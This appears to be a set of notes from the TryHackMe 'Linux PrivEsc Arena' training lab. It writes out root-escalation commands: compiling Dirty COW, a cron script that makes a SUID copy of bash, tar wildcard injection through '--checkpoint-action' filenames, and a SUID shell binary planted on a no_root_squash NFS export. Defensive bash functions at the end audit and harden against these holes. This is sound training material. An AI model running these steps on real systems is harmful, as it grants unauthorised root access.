TryHackMe | Linux PrivEsc Arena

gcc -pthread c0w.c -o cow

Dirty COW will replace passwd with another application that makes us root.
Vulnerable cron job at a readable path. Let's create a copy of bash with the SUID bit set to make us root.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
chmod +x /home/user/overwrite.sh
In our case, a job with a wildcard runs every minute and makes a backup of the whole user folder. The wildcard allows us to inject malicious code so that the job creates a root bash.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
chmod +x /home/user/runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
cat /etc/exports
# look for "no_root_squash"
Then on the attacker machine, we can mount the folder and create malicious code.
showmount -e <ip>
mkdir /tmp/mountme
mount -o rw,vers=2 <ip>:/<folder> /tmp/mountme
echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/mountme/x.c
gcc /tmp/mountme/x.c -o /tmp/mountme/x
chmod +s /tmp/mountme/x
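
From the defender's side, the cron wildcard and NFS steps above can be audited with the following bash functions. This is an added example, not part of the original notes or the TryHackMe room; the function names are hypothetical, and it assumes the backup job is a tar command run with a shell wildcard, as the --checkpoint filenames imply.

```bash
#!/usr/bin/env bash
# Added defensive example; function names are hypothetical, not from the room.

# Print "<path> <client(options)>" for each export that disables root squashing.
# Comments and blank lines are skipped; a line may list several clients.
find_no_root_squash() {
    local exports_file=$1 line client
    local -a fields
    local re='[(,]no_root_squash[,)]'
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}                       # drop comments
        read -r -a fields <<<"$line"           # word-split without globbing
        if [ "${#fields[@]}" -lt 2 ]; then continue; fi
        for client in "${fields[@]:1}"; do
            if [[ $client =~ $re ]]; then
                printf '%s %s\n' "${fields[0]}" "$client"
            fi
        done
    done <"$exports_file"
}

# Print names in a directory that start with '-': a job running "cmd *" there
# passes them to cmd as options (e.g. tar's --checkpoint-action).
find_option_like_names() {
    local dir=$1 f
    for f in "$dir"/-*; do
        if [ -e "$f" ]; then printf '%s\n' "${f##*/}"; fi
    done
}

# Hardened form of a "tar ... *" backup: with the ./ prefix no expanded name
# can begin with '-', so each match is archived as an ordinary file.
# The archive path must be absolute because of the cd.
safe_backup() {
    local src=$1 archive=$2
    ( cd "$src" && tar -cf "$archive" ./* )
}
```

On the NFS server, a flagged export is fixed by removing no_root_squash (root_squash is the default) and re-exporting with `exportfs -ra`.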